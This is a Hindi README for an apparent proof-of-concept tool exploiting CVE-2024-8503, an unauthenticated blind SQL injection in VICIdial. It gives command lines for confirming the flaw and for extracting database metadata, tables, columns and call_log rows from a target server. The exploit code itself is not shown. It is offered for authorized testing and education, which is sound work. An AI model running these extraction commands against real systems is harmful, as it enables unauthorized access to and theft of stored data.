
VICIdial CVE-2024-8503 के लिए बिना प्रमाणीकरण वाला समय-आधारित ब्लाइंड SQL इंजेक्शन PoC, जिसमें मेटाडेटा निष्कर्षण, फिर से शुरू करने योग्य स्कैन और सख्त सुरक्षा सीमाएँ शामिल हैं।
VICIdial के VERM_AJAX_functions.php एंडपॉइंट (CVE-2024-8503) के लिए बिना प्रमाणीकरण वाला टाइम-आधारित ब्लाइंड SQL इंजेक्शन प्रूफ-ऑफ-कॉन्सेप्ट। यह प्रोजेक्ट केवल अधिकृत सुरक्षा परीक्षण, सत्यापन और शिक्षा के लिए है।
CVE-2024-8503, VICIdial में एक बिना प्रमाणीकरण वाला SQL इंजेक्शन है, जहाँ एक विशेष रूप से तैयार किया गया Basic Auth उपयोगकर्ता-नाम मान VERM_AJAX_functions.php में कमजोर क्वेरी लॉजिक तक पहुँच सकता है। यह PoC टाइम-आधारित अनुमान का उपयोग करके शोषण-क्षमता की पुष्टि करता है और नियंत्रित तरीके से सीमित मेटाडेटा और टेबल डेटा निकालता है।
यह रिलीज़ सख्त प्रूफ-ऑफ-कॉन्सेप्ट सीमाएँ लागू करती है:
requestsनिर्भरताएँ स्थापित करें:
pip install requests
बिना कोई नेटवर्क अनुरोध किए कॉन्फ़िगरेशन की पुष्टि करने के लिए स्थानीय सेल्फ-चेक चलाएँ:
python3 CVE-2024-8503-POC.py --self-check
एक बुनियादी गैर-इंटरैक्टिव स्कैन चलाएँ:
python3 CVE-2024-8503-POC.py --url https://target.tld
इंटरैक्टिव मोड ऑपरेटर-संचालित परीक्षण के लिए एक अलग वर्कफ़्लो है। यह तब उपयोगी होता है जब आप एक ही कमांड चलाने के बजाय निष्कर्षण कार्यों को मैन्युअल रूप से चरणबद्ध तरीके से करना चाहते हैं।
python3 CVE-2024-8503-POC.py --url https://target.tld --interactive
इंटरैक्टिव मेनू मेटाडेटा निष्कर्षण, टेबल और कॉलम खोज, मैनुअल निष्कर्षण, ऑटो-निष्कर्षण, कस्टम क्वेरी और फिर से शुरू करने योग्य पूर्ण स्कैन का समर्थन करता है।
इन कमांड्स का उपयोग तब करें जब आप इंटरैक्टिव मेनू में प्रवेश किए बिना कोई विशिष्ट कार्य करना चाहते हैं।
मेटाडेटा निकालें:
python3 CVE-2024-8503-POC.py --url https://target.tld --metadata db_version database db_user
टेबल सूचीबद्ध करें:
python3 CVE-2024-8503-POC.py --url https://target.tld --list-tables
किसी टेबल के कॉलम प्राप्त करें:
python3 CVE-2024-8503-POC.py --url https://target.tld --get-columns call_log
विशिष्ट कॉलम निकालें:
python3 CVE-2024-8503-POC.py --url https://target.tld --table call_log --columns uniqueid,channel --rows 3
टेबल डेटा ऑटो-निकालें:
python3 CVE-2024-8503-POC.py --url https://target.tld --auto-extract call_log
पूर्ण स्कैन:
python3 CVE-2024-8503-POC.py --url https://target.tld --full-scan
कस्टम क्वेरी (केवल SELECT):
python3 CVE-2024-8503-POC.py --url https://target.tld --custom-query "SELECT DATABASE()"
वैकल्पिक फ़्लैग:
--path एंडपॉइंट पथ बदलने के लिए (डिफ़ॉल्ट: /VERM/VERM_AJAX_functions.php)--skip-vuln-check प्रारंभिक पुष्टिकरण प्रोब को छोड़ने के लिए--export परिणाम सहेजने के लिए (मेटाडेटा/पूर्ण स्कैन के लिए JSON, टेबल डेटा के लिए CSV)प्रगति स्वचालित रूप से यहाँ सहेजी जाती है:
.vicidial_scan_state.json
यदि कोई पिछला स्कैन मिलता है, तो स्क्रिप्ट फिर से शुरू करने या स्थिति साफ़ करने का विकल्प देगी।
LICENSE फ़ाइल जोड़ी जानी चाहिए; यह README MIT मानता है।यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। किसी भी सिस्टम का परीक्षण करने से पहले जिसके आप स्वामी नहीं हैं, आपको स्पष्ट लिखित अनुमति प्राप्त करनी होगी। लेखक इस टूल के दुरुपयोग या उससे होने वाली क्षति के लिए कोई दायित्व नहीं मानता है।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है। विवरण के लिए रिपॉजिटरी-स्तर की LICENSE फ़ाइल देखें।